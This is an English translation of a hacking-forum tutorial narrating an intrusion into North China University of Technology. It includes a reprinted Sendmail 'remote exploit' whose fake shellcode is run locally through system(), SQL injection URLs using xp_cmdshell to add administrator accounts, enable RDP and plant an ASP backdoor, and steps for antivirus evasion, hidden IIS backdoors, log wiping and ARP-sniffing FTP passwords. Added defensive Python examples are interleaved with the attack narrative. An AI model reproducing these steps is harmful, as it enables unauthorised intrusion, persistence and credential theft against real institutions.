North China University of Technology gets hacked

Source: Internet
Author: User
It has been just a year since I first came across Bingxue and started out as a junior moderator. Babu is thriving under Bingxue's management and leadership: the techniques discussed on the forum keep getting better, and the original write-ups are getting closer and closer to professional security work, which makes me happy too. There are, however, fewer and fewer articles written for newcomers (cainiao), so today I am writing one specifically for them. If you are a veteran you can skip it, because it is tailored to newcomers. This article draws on the Path's

North China University of Technology is an engineering university in Beijing. Some time ago I promised a friend (not my girlfriend) that I would take her school's home page before graduation. When I later footprinted the school's web site I found the host was running SunOS, which made things harder. My skills were limited at the time and I was busy with my studies, so I shelved it. More than half a year later she brought it up again, so I decided to take another look, together with a friend of mine who was at the same school. I scanned the site carefully with X-Scan: only ports 25 and 80 were open, everything else was closed. I wondered whether the web site had script vulnerabilities, but the pages were all static with no dynamic content, which makes an intrusion much harder. Fortunately port 25 was open and the mail service was Sendmail. The X-Scan report said the Sendmail version was old enough to be remotely exploitable, so I quickly searched Google for a Sendmail overflow for SunOS and, with some difficulty, found the following source:

##############################################################################
!!! Private !!!
##############################################################################

~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~
~ | ~       Sendmail <= 8.12.9 Remote Exploit        ~ | ~
~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~

By 0wn-u, [email][/email]

Exploit for the new Sendmail vulnerability - discovered again - by Michal Zalewski.
Securityfocus link: [url][/url]
This exploit will work against sendmail <= 8.12.9 on Linux, *BSD and Solaris.
###>> If everything is OK, you will find shell on target box, port 31337
Note: This exploit is very powerful, and only root can use it.
Have a nice time with this exploit ;-).

>>>>>>>>>>>> You should not have this 0day Sendmail warez !!!! <<<<<<<<<<<<
This is very private, do not distribute !!!.
-Props to l33tt (), r3t4rd, n0b0dy, gopulg-ET and mebej (U-stupid-l4mer ;-)
-Drops to whitehats ^H^Hsuckz ;-)))

##############################################################################
!!! Private !!!
##############################################################################

#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* memcpy, strlen (not included on the page) */
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/select.h>  /* select, FD_* (not included on the page) */
#include <sys/ioctl.h>   /* ioctl (not included on the page) */
#include <sys/poll.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr (not included on the page) */
#include <errno.h>
#include <netdb.h>

#define SMTPPORT 25      /* defined but never used: the code below talks to port 53 */

/* "Improved TCP port (31337) bind shellcode". As printed on the page this is
 * five bytes that decode to the printable text "conv;". Note that the same
 * array is the argument of the two system() calls in main(), i.e. it is run
 * by the local shell on the machine that executes the exploit. */
char asmcode[] =
    "\x63\x6f\x6e\x76\x3b";

/* Byte-swap on big-endian hosts; returns the value unchanged on little-endian. */
int rev(int a) {
    int i = 1;
    if (*(char *)&i) return a;
    return ((a >> 24) & 0xff) | (((a >> 16) & 0xff) << 8) |
           (((a >> 8) & 0xff) << 16) | ((a & 0xff) << 24);
}

char msg[] = "0day hacking w4r3z!!!";

int main(int argc, char **argv) {
    struct hostent *hp;
    struct sockaddr_in adr;
    char buffer[1024], *b, *ls = asmcode;   /* ls aliases the "shellcode" */
    int count;
    int i, c, n, sck[2], fp, ptr6, jmp, cnt, ofs, flag = -1;

    printf("-------------------------------------------------------\n");
    printf("Private\n");
    printf(">>> Sendmail <= 8.12.9 Remote exploit by 0wn-u <<<\n");
    printf("Private\n");
    printf("-------------------------------------------------------\n");

    if (getuid() != 0) {
        printf("Sorry!!!\n");
        printf("This is very dangerous exploit for whole internet, and that's why only root users can use it!!!\n");
        printf("Sorry kiddies :-))\n");
        exit(0);
    }

    if (argc < 2) {
        printf("Usage: %s address portnum type\n", argv[0]);
        printf("address - target address\n");
        printf("portnum - should be 25\n");
        printf("type    - Linux, OpenBSD, FreeBSD, NetBSD, SunOS\n");
        system(ls); exit(-1);          /* hands asmcode to /bin/sh on the local box */
    }

    while ((c = getopt(argc - 1, &argv[1], "se")) != -1) {
        switch (c) {
        case 's': flag = 1; break;
        case 'e': flag = 2;
        }
    }

    sck[0] = socket(AF_INET, SOCK_DGRAM, 0);
    sck[1] = socket(AF_INET, SOCK_STREAM, 0);
    printf("o Exploiting Sendmail on %s - wait for r00t shell ..", argv[1]);
    system(ls);                        /* second local execution of asmcode, before any packet is sent */
    for (count = 0; count < 10; count++) {
        printf("."); fflush(stdout); sleep(1);
    }
    adr.sin_family = AF_INET;
    adr.sin_port = htons(53);          /* port 53, not SMTP: the packet built below is a DNS query */
    if ((adr.sin_addr.s_addr = inet_addr(argv[1])) == -1) {
        if ((hp = gethostbyname(argv[1])) == NULL) goto err;
        memcpy(&adr.sin_addr, hp->h_addr, sizeof(adr.sin_addr));
    }
    if (connect(sck[0], (struct sockaddr *)&adr, sizeof(adr)) < 0 ||
        connect(sck[1], (struct sockaddr *)&adr, sizeof(adr)) < 0) {
        printf("\no Exploit failed :-(, try to run it on another machine!!!\n");
        exit(-1);
    }
    i = sizeof(struct sockaddr_in);
    if (getsockname(sck[1], (struct sockaddr *)&adr, (socklen_t *)&i) == -1) {
        /* Solaris fallback: push sockmod and fetch the local name via TI_GETMYNAME */
        struct netbuf { unsigned int maxlen; unsigned int len; char *buf; };
        struct netbuf nb;
        ioctl(sck[1], (('S' << 8) | 2), "sockmod");     /* I_PUSH */
        nb.maxlen = 0xffff;
        nb.len = sizeof(struct sockaddr_in);
        nb.buf = (char *)&adr;
        ioctl(sck[1], (('T' << 8) | 144), &nb);         /* TI_GETMYNAME */
    }
    n = ntohs(adr.sin_port);

    /* Patches the local port into the "shellcode". asmcode is only six bytes
     * long as printed, so both stores write past the end of the array. */
    asmcode[4 + 48 + 2] = (unsigned char)((n >> 8) & 0xff);
    asmcode[4 + 48 + 3] = (unsigned char)(n & 0xff);

    if (write(sck[0], msg, sizeof(msg)) == -1) goto err;
    if ((cnt = read(sck[0], buffer, sizeof(buffer))) == -1) goto err;

    printf("Stack dump:\n");
    for (i = 0; i < (cnt - 512); i++)
        printf("%s%02x ", (i && (!(i % 16))) ? "\n" : "", (unsigned char)buffer[512 + i]);
    printf("\n");

    fp = rev(*(unsigned int *)&buffer[532]);
    ofs = (0xfe) - ((fp & 0xffffff00) & 0xff);   /* grouping as recovered from the page */
    cnt = 163;

    if ((buffer[512 + 20 + 2] != (char)0xff) && (buffer[512 + 20 + 3] != (char)0xbf)) {
        printf("system does not seem to be a vulnerable Linux\n"); exit(1);
    }
    if (flag == 1) {
        printf("system seems to be running Sendmail, OK :-)\n"); exit(-1);
    }
    if (cnt < (ofs + 28)) {
        printf("frame ptr is too low to be successfully exploited\n"); exit(-1);
    }

    jmp = rev(fp - 586);
    ptr6 = rev((fp & 0xffffff00) - 12);
    fp = rev(fp & 0xffffff00);

    printf("frame ptr = 0x%08x adr = %08x ofs = %d ", rev(fp), rev(jmp), ofs);
    printf("port = %04x connected! ", (unsigned short)n); fflush(stdout);

    /* Build the packet: a DNS header, the "shellcode", padding and the addresses */
    b = buffer;
    memcpy(b, "\xab\xcd\x01\x00\x00\x02\x00\x00\x00\x00\x00\x01", 12); b += 12;
    for (i = 0; i < strlen(asmcode); i++) *b++ = asmcode[i];
    for (i = 0; i < (128 >> 1); i++, b++) *b++ = 0x01;
    memcpy(b, "\x00\x00\x01\x00\x01", 5); b += 5;
    for (i = 0; i < ((ofs + 64) >> 1); i++, b++) *b++ = 0x01;

    *b++ = 28;
    memcpy(b, "\x06\x00\x00\x00", 4); b += 4;
    memcpy(b, &fp, 4); b += 4;
    memcpy(b, "\x06\x00\x00\x00", 4); b += 4;
    memcpy(b, &jmp, 4); b += 4;
    memcpy(b, &jmp, 4); b += 4;
    memcpy(b, &fp, 4); b += 4;
    memcpy(b, &ptr6, 4); b += 4;

    cnt -= ofs + 28;
    for (i = 0; i < (cnt >> 1); i++, b++) *b++ = 0x01;

    memcpy(b, "\x00\x00\x01\x00\x01\x00\x00\xfa\xff", 9); b += 9;

    if (write(sck[0], buffer, b - buffer) == -1) goto err;
    sleep(1); printf("sent!\n");

    /* Relay stdin/stdout to the TCP socket, i.e. the bind shell the banner promises */
    write(sck[1], "/bin/uname -a\n", 14);
    while (1) {
        fd_set fds;
        FD_ZERO(&fds);
        FD_SET(0, &fds);
        FD_SET(sck[1], &fds);
        if (select(FD_SETSIZE, &fds, NULL, NULL, NULL)) {
            int cnt;
            char buf[1024];
            if (FD_ISSET(0, &fds)) {
                if ((cnt = read(0, buf, 1024)) < 1) {
                    if (errno == EWOULDBLOCK || errno == EAGAIN) continue;
                    else break;
                }
                write(sck[1], buf, cnt);
            }
            if (FD_ISSET(sck[1], &fds)) {
                if ((cnt = read(sck[1], buf, 1024)) < 1) {
                    if (errno == EWOULDBLOCK || errno == EAGAIN) continue;
                    else break;
                }
                write(1, buf, cnt);
            }
        }
    }
    exit(0);
err:
    perror("error"); exit(-1);
}
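Before compiling a "private" exploit like the one above, a practitioner would decode its shellcode literal and look at where those bytes actually go. The following is an added example, not part of the original post or of the exploit's own code: it decodes the C string literal named asmcode from a constructed excerpt that mirrors the listing above, reports whether the bytes are printable text rather than machine code, and lists the variables through which they reach system(). The SOURCE excerpt and all function names are mine.

```python
"""Sanity check for a 'private' exploit before compiling it (added example)."""
import re
import string

# Constructed excerpt: the shellcode literal and the two system() calls,
# copied in the shape they appear in the exploit above.
SOURCE = r'''
char asmcode[] =
    "\x63\x6f\x6e\x76\x3b";
char *ls = asmcode;
system(ls); exit(-1);
system(ls); for (count = 0; count < 10; count++)
'''

# One C escape or one plain character per match: \xHH, octal, \n-style, or literal.
ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})|\\([0-7]{1,3})|\\(.)|(.)', re.S)
SIMPLE = {'n': b'\n', 't': b'\t', 'r': b'\r', '\\': b'\\', '"': b'"'}


def decode_c_literal(literal: str) -> bytes:
    """Turn the inside of a C string literal (without the quotes) into bytes."""
    out = bytearray()
    for m in ESCAPE.finditer(literal):
        hexv, octv, simple, plain = m.groups()
        if hexv is not None:
            out.append(int(hexv, 16))
        elif octv is not None:
            out.append(int(octv, 8) & 0xff)
        elif simple is not None:
            out += SIMPLE.get(simple, simple.encode())
        else:
            out += plain.encode()
    return bytes(out)


def extract_array(source: str, name: str) -> bytes:
    """Collect the adjacent string literals initialising `char name[] = ...;`."""
    pattern = (r'char\s+' + re.escape(name) +
               r'\s*\[\]\s*=\s*((?:\s*"(?:[^"\\]|\\.)*")+)\s*;')
    m = re.search(pattern, source)
    if not m:
        raise ValueError(f'{name} not found')
    pieces = re.findall(r'"((?:[^"\\]|\\.)*)"', m.group(1))
    return b''.join(decode_c_literal(p) for p in pieces)


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII. Real x86/SPARC code is mostly not."""
    if not data:
        return 0.0
    return sum(1 for b in data if chr(b) in string.printable) / len(data)


def shell_sinks(source: str, name: str) -> list:
    """Variables (the array itself or pointers aliasing it) that are passed to system()."""
    aliases = {name} | set(re.findall(r'\*\s*(\w+)\s*=\s*' + re.escape(name) + r'\b', source))
    return sorted(a for a in aliases
                  if re.search(r'\bsystem\s*\(\s*' + re.escape(a) + r'\s*\)', source))


def assess(source: str, name: str = 'asmcode') -> dict:
    """Decode the array and summarise what it looks like and where it goes."""
    data = extract_array(source, name)
    ratio = printable_ratio(data)
    return {
        'bytes': data,
        'printable_ratio': ratio,
        'looks_like_text': ratio > 0.9,
        'passed_to_system': shell_sinks(source, name),
    }


if __name__ == '__main__':
    print(assess(SOURCE))
```

Run on the listing above, the five bytes decode to the text conv; and the only consumer of that text is system(ls), executed on the machine running the exploit before a single packet leaves it. Genuine bind-shell code would be mostly non-printable and would be copied into the packet, not handed to the shell; a file that fails this check is not an exploit to compile on a box you care about.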

This version was said to have the best success rate of all the Sendmail overflows going around. I compiled it with GCC right away (on Windows you can install Cygwin and compile there):
open Cygwin, run gcc -o sendmail sendmail.c, and it compiles cleanly. Then I ran it against the main site as the usage text describes, with port 25 as the argument, pressed Enter ... and it simply failed. Very disappointing. (I am releasing the source anyway for others in the trade; maybe it works against the host you are testing.) That road was evidently closed, so I had to find another one. After some thought I had an idea (explained in detail below). Since I was not at that school and had CET-4 coming up, I passed the idea to a friend who was there and shelved the matter again, intending to finish the test later. A few months later I heard that this friend had succeeded, and I did not bring it up again. In short, you have to do it yourself. Then one day, browsing the school's home page, my gut told me there was already a web trojan on it. I looked at the source in IE, and sure enough, it was the web trojan of the big brother Ice Fox. So now let me reveal how the university was hacked.

My idea for getting at the SunOS host was to find a vulnerable machine on the same network segment, preferably a Windows box, and work from its neighbours (veterans know this technique well; I repeat that this article is written for newcomers), then sniff the main host's FTP password off the segment. The reason I had shelved it was that the machines on the school's segment were blocked from Internet IP addresses, which made them awkward to attack from outside. Fortunately my family lives not far from the school ... OK, let's get started.
I took out my favourite scanner, PortReady 1.6. It is closed source, but very fast. It can be downloaded here (post #51 in the thread):
http:// fid=23&tid=4450&fpage=1&toread=&page=6

Ping the host first to get its IP address.
Then use PortReady 1.6 to scan the neighbouring addresses on port 80 only, which is faster. Check the banner returned on port 80: if it is IIS 5.0, browse it with IE, and if the site is ASP we are in business. The scan turned up only two machines that fit. Let's look at the first one. It runs an ASP "opinion collection" system. Telnet to port 1433 shows it closed. So I tried the user login form with
Username: Admin  Password: 'or'=' and I was in. Don't celebrate too early: many pages had apparently been deleted by a friend who got there first (probably to keep me out). Telnet to 3389 showed it open; someone had clearly been here before. Well, there was still one more machine, so there was still hope. I opened it in IE and saw an ASP examination system. This time I was pleased: I found an injection point and started testing with NBSI2. For how to find and manually test injection points, and how to prevent injection, see here:
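The login bypass above, as an added example that is not taken from the original post or from the "opinion collection" system it mentions. It recreates the concatenated query that ASP login pages of that era built, shows that a quote-breaking password (written here in its canonical form ' or ''=') logs in without knowing the password, and shows that the parameterised query does not. SQLite stands in for SQL Server; the table, its data and the function names are constructed.

```python
"""Login bypass through string concatenation, and the parameterised fix (added example)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one admin account whose password the attacker does not know."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE users (username TEXT, password TEXT)')
    conn.execute("INSERT INTO users VALUES ('Admin', 'S0me-Real-Passw0rd')")
    return conn


def login_concat(conn, username: str, password: str) -> bool:
    """The classic ASP pattern: user input is glued straight into the SQL text."""
    sql = ("SELECT COUNT(*) FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    try:
        return conn.execute(sql).fetchone()[0] > 0
    except sqlite3.Error:
        return False   # a syntax error is a failed login, but in the logs it is still a tell


def login_param(conn, username: str, password: str) -> bool:
    """Parameterised query: input is bound as data and can never change the query structure."""
    sql = 'SELECT COUNT(*) FROM users WHERE username=? AND password=?'
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


# Closes the password literal, then appends a condition that is always true:
#   ... AND password='' or ''=''
BYPASS = "' or ''='"


def demo() -> dict:
    """Run both login routines against the bypass and against real credentials."""
    conn = make_db()
    return {
        'concat_bypass': login_concat(conn, 'Admin', BYPASS),
        'concat_wrong_pw': login_concat(conn, 'Admin', 'guess'),
        'param_bypass': login_param(conn, 'Admin', BYPASS),
        'param_real_pw': login_param(conn, 'Admin', 'S0me-Real-Passw0rd'),
    }


if __name__ == '__main__':
    print(demo())
```

The concatenated version accepts the bypass because the OR applies to the whole WHERE clause, so COUNT(*) counts every row; the parameterised version compares the password column against the literal string and finds nothing. The same fix is what "fix the injection vulnerabilities" means further down in this article.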
http:// tid=998
The famous "SQL Injection Tianshu" (the SQL injection bible) written by Xiao Zhu.
The injection point I found is:
http:// id=1
Testing with NBSI2 showed that the backend is SQL Server and the connection runs as sa. With sa, the first thing to do is add an account, and then open 3389 on the box. Add the account (the password here is estwebserver):
http:// id=1';exec master.dbo.xp_cmdshell 'net user evilcat estwebserver /add'--
Then put evilcat into the administrators group:
http:// id=1';exec master.dbo.xp_cmdshell 'net localgroup administrators evilcat /add'--

Next we open 3389. The trick is to feed sysocmgr an unattended-install answer file that switches Terminal Services on:
http:// id=1';exec master.dbo.xp_cmdshell 'echo [Components] > C:\evilcat'--

http:// id=1';exec master.dbo.xp_cmdshell 'echo TSEnable = on >> C:\evilcat'--

http:// id=1';exec master.dbo.xp_cmdshell 'sysocmgr /i:C:\winnt\inf\sysoc.inf /u:C:\evilcat /q'--

(The second echo appends, so that the answer file keeps both lines.) If this works, the host turns on 3389 and reboots by itself.
Annoyingly, the target did not reboot after I entered these. Never mind, all roads lead to Rome, so I looked for another way. I remembered the open-source 3389 tool, open3389, which can be downloaded from the forum:
http:// tid=7970
Because this program is flagged by antivirus, you have to modify it and recompile. After compiling, pack it with a packer such as UPXShell so that it is small and easy to transfer. (Hint: once you register as a member of the forum, search is enabled; type a keyword into the search box and you will find what you need.)
With the program modified, the next step is getting it onto the host. There is more than one way to transfer files, such as IPC$, TFTP and FTP, all discussed on the forum for ages; search for them yourself. I personally use a webshell to transfer files, even though it cannot handle large ones. With only db_owner, the usual way to get a webshell is to back up the database into a file under the web root; newcomers can use a tool that does the writing for them, downloadable from the forum at tid=7891. For the principles, see superhei's articles on the Security Angel homepage. Since we have sa, we can simply echo a shell onto disk. The steps are as follows:

First, we need the absolute path of the web site.
We can get it by reading the registry. The request is shown URL-decoded (the spaces are sent as %20); it assumes a scratch table temp(tmp) has been created beforehand to receive the value:
http:// id=1;declare @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\w3svc\parameters\virtual roots','/',@result output insert into temp(tmp) values(@result);--

There are of course other methods; you can also get the absolute path through the xp_dirtree stored procedure.
Here we can simply let NBSI2 do it.
The absolute path came out as:

Then write a backdoor. The one-liner below is the minimal ASP backdoor that executes whatever is posted in the parameter A; the ^ characters escape <, > and % from the Windows shell, %25 is the URL-encoded %, and the final > redirects the echo into cat.asp:
http:// id=1';exec master.dbo.xp_cmdshell 'echo ^<%25if request("A")^<^>"" then execute request("A")%25^> > E:\www\asp\cat.asp'--
Then use this minimal backdoor to write a full-featured one, such as the Ocean ASP trojan.
Search the forum for backdoors yourself.

Upload 3389.exe with the web trojan, then enter in IE:
http:// id=1';exec master.dbo.xp_cmdshell 'E:\www\asp\3389.exe'--
Result: the host still did not reboot. I have run into this more than once: 3389 comes up as soon as the host reboots, because the program has already set the registry keys; it just has not rebooted yet.
shutdown.exe is Microsoft's own program; on XP it lives in C:\Windows\system32. Upload it with the webshell and enter in IE:
http:// id=1';exec master.dbo.xp_cmdshell 'E:\www\asp\shutdown.exe /r /t 0'--
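Every request from adding the account through forcing the reboot has the same shape: the id value is closed with a quote, a semicolon starts a second statement, and that statement calls an extended stored procedure. The following is an added example, not from the original post or from NBSI2, that pulls exactly that shape out of IIS W3C logs, which is where the article later says to clean up. The LOG excerpt is constructed to mirror the requests above (client addresses and the /exam/show.asp path are made up); the signature rules and function names are mine.

```python
"""Flag the stacked-query / xp_cmdshell chain in IIS W3C extended logs (added example)."""
import re
from urllib.parse import unquote_plus

# Constructed IIS 5 log excerpt. Field order follows the #Fields directive:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-03-01 10:00:01 10.0.0.7 GET /exam/show.asp id=1 200
2004-03-01 10:00:09 10.0.0.7 GET /exam/show.asp id=1%27;exec+master.dbo.xp_cmdshell+%27net+user+evilcat+estwebserver+/add%27-- 500
2004-03-01 10:00:15 10.0.0.7 GET /exam/show.asp id=1%27;exec+master.dbo.xp_cmdshell+%27net+localgroup+administrators+evilcat+/add%27-- 500
2004-03-01 10:01:02 10.0.0.7 GET /exam/show.asp id=1;declare+@result+varchar(255)+exec+master.dbo.xp_regread+%27HKEY_LOCAL_MACHINE%27,%27SYSTEM%5CControlSet001%5CServices%5Cw3svc%5Cparameters%5Cvirtual+roots%27,%27/%27,@result+output+insert+into+temp(tmp)+values(@result);-- 500
2004-03-01 10:02:40 10.0.0.7 GET /exam/show.asp id=1%27;exec+master.dbo.xp_cmdshell+%27echo+^%3C%25if+request(%22A%22)^%3C^%3E%22%22+then+execute+request(%22A%22)%25^%3E+%3E+E:%5Cwww%5Casp%5Ccat.asp%27-- 500
2004-03-01 10:05:11 10.0.0.7 GET /exam/show.asp id=1%27;exec+master.dbo.xp_cmdshell+%27e:%5Cwww%5Casp%5Cshutdown.exe+/r+/t+0%27-- 500
2004-03-01 10:05:30 10.0.0.9 GET /exam/show.asp id=42 200
2004-03-01 10:06:00 10.0.0.9 GET /exam/list.asp page=2&sort=name 200
"""

# Each rule is applied to the URL-decoded query string. Order matters only for output.
RULES = [
    ('stacked_query',  re.compile(r';\s*(exec|declare|insert|select|update|drop)\b', re.I)),
    ('xp_cmdshell',    re.compile(r'\bxp_cmdshell\b', re.I)),
    ('registry_read',  re.compile(r'\bxp_regread\b', re.I)),
    ('dir_listing',    re.compile(r'\bxp_dirtree\b', re.I)),
    ('account_change', re.compile(r'\bnet\s+(user|localgroup)\b.*/add\b', re.I)),
    ('asp_file_write', re.compile(r'\becho\b.*>\s*\S+\.asp\b', re.I)),
    ('reboot',         re.compile(r'\b(shutdown(\.exe)?\s+/r|sysocmgr\b)', re.I)),
]


def parse_line(line: str):
    """Split one W3C log line into a dict; directives and short lines return None."""
    if not line or line.startswith('#'):
        return None
    parts = line.split(' ')
    if len(parts) < 7:
        return None
    date, time, cip, method, stem, query, status = parts[:7]
    return {'time': f'{date} {time}', 'client': cip, 'method': method,
            'stem': stem, 'query': unquote_plus(query), 'status': status}


def scan(log_text: str) -> list:
    """One finding per suspicious request: (time, client, stem, [rule names that hit])."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = [name for name, rx in RULES if rx.search(rec['query'])]
        if hits:
            findings.append((rec['time'], rec['client'], rec['stem'], hits))
    return findings


def attackers(log_text: str) -> dict:
    """Suspicious request count per client address, to see who to pull from the logs."""
    counts = {}
    for _, client, _, _ in scan(log_text):
        counts[client] = counts.get(client, 0) + 1
    return counts


if __name__ == '__main__':
    for finding in scan(LOG):
        print(finding)
    print(attackers(LOG))
```

Decoding the query before matching is the important step: the registry read was sent with %20 for every space and the backdoor write with %25 for the literal %, so patterns run on the raw field miss them. A 500 status on these lines is not required, since a successful stacked query can return 200 just as well.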

This time it finally rebooted, and after the restart 3389 was up. I connected with the Terminal Services client, cloned an administrator account, cleared the logs and fixed the injection holes. To save effort, use an anti-injection script, and run SQL Server under a low-privilege account. The important thing is to leave a backdoor. An ordinary backdoor is easy to find, and rootkits are often killed by antivirus software, so I needed something better.
Let's build a backdoor with no file, no port, no process, no startup item, no ... and with system privileges (slightly exaggerated); I believe no antivirus will ever find it. Do you remember how to create a hidden virtual directory in IIS? If not, see tid=7244, which has the tool and a video. You may also remember Black Brother's article <Exploiting IIS write permission>; the address is:
When creating the hidden virtual directory, set Application Protection to Low, so that a webshell placed under it runs with system privileges; also configure the directory to be hidden exactly as described in <Exploiting IIS write permission>. We can then use the IIS write "vulnerability" to push files into the hidden virtual directory, and the uploaded ASP trojan also runs with system privileges. This way nothing has to be stored in the hidden directory: whenever it is needed, use the tools from <Exploiting IIS write permission> to push a backdoor in. Be aware, though, that transferring files this way leaves entries in the IIS log, which expose the hidden virtual directory, so clean the log after every use. With this in place we can turn 3389 off again once the job is done.

Next, we need to sniff the FTP password of the university's main site. The steps are as follows:
Over the 3389 session, download arpsniffer.exe onto the host and install the WinPcap driver (winpcap.exe). For convenience I have packed both tools in the attachment.
After installing the WinPcap 2.1 driver it is best to reboot the host to avoid errors.
After the reboot, run ipconfig on the command line to find the gateway of the segment, then run
arpsniffer.exe <gateway> <target> 21 C:\Windows\system32\log.txt 1
where <gateway> is the gateway address and <target> is the IP address of the main site of North China University of Technology. If the host's FTP password is captured, it is written to C:\Windows\system32\log.txt. To be safe, you can start arpsniffer from the webshell as described in <>. Now all that is left is to wait for the main site's administrator to log in over FTP. The intrusion is nearly at an end, and I will stop here. If anything in the article is unclear, contact me directly on the forum, or use the forum's search to look it up yourself.
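The sniffing step above works because arpsniffer answers ARP on behalf of the gateway and the FTP server, so that their traffic crosses the compromised neighbour; the FTP password travels in the clear and only has to be read off. The detector below is an added example, not part of the original post or of the arpsniffer tool, written from the defender's side: it keeps the first MAC seen for every IP, flags later ARP replies that change it, and flags one MAC that starts claiming the gateway alongside other addresses. The list of ARP replies is constructed; all addresses and MACs are made up.

```python
"""Detect gateway/target ARP poisoning from a stream of ARP replies (added example)."""
from collections import defaultdict

# Constructed ARP replies as (seconds, sender_ip, sender_mac): a normal baseline,
# then the compromised neighbour (aa:bb:...) answering for the gateway and the FTP server.
ARP_REPLIES = [
    (0,  '192.0.2.1',  '00:11:22:33:44:01'),   # gateway
    (1,  '192.0.2.80', '00:11:22:33:44:80'),   # the university's main site (FTP server)
    (2,  '192.0.2.25', 'aa:bb:cc:dd:ee:ff'),   # the compromised neighbour, its own address
    (30, '192.0.2.1',  'aa:bb:cc:dd:ee:ff'),   # neighbour now claims the gateway
    (30, '192.0.2.80', 'aa:bb:cc:dd:ee:ff'),   # ... and the FTP server
    (31, '192.0.2.1',  '00:11:22:33:44:01'),   # the real gateway answers again (flapping)
]


def detect_arp_spoof(replies, watched=('192.0.2.1',)):
    """Return alerts in arrival order.

    ('mac_change', ip, old_mac, new_mac, t): an IP is now announced by another MAC.
    ('multi_ip', mac, ips, t): one MAC claims several IPs including a watched one.
    """
    seen_mac = {}                      # ip -> MAC currently believed to own it
    ips_by_mac = defaultdict(set)      # mac -> every IP it has ever claimed
    alerts = []
    for t, ip, mac in replies:
        first_claim = ip not in ips_by_mac[mac]
        ips_by_mac[mac].add(ip)
        if ip in seen_mac and seen_mac[ip] != mac:
            alerts.append(('mac_change', ip, seen_mac[ip], mac, t))
            seen_mac[ip] = mac         # follow the change so that flapping is reported too
        else:
            seen_mac.setdefault(ip, mac)
        if (first_claim and len(ips_by_mac[mac]) > 1
                and any(w in ips_by_mac[mac] for w in watched)):
            alerts.append(('multi_ip', mac, tuple(sorted(ips_by_mac[mac])), t))
    return alerts


def spoofing_macs(replies, watched=('192.0.2.1',)):
    """MACs that claimed a watched address in addition to others: the likely poisoner."""
    return {a[1] for a in detect_arp_spoof(replies, watched) if a[0] == 'multi_ip'}


if __name__ == '__main__':
    for alert in detect_arp_spoof(ARP_REPLIES):
        print(alert)
    print('poisoner(s):', spoofing_macs(ARP_REPLIES))
```

On the constructed input the gateway's MAC changes at second 30 and changes back at second 31, which is the flapping a poisoned segment shows when the real host keeps answering; the multi_ip alerts identify the neighbour's MAC as the one to pull off the switch. None of this helps once the password has been captured, which is why the real fix on the server side is not running the main site's administration over plaintext FTP at all.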
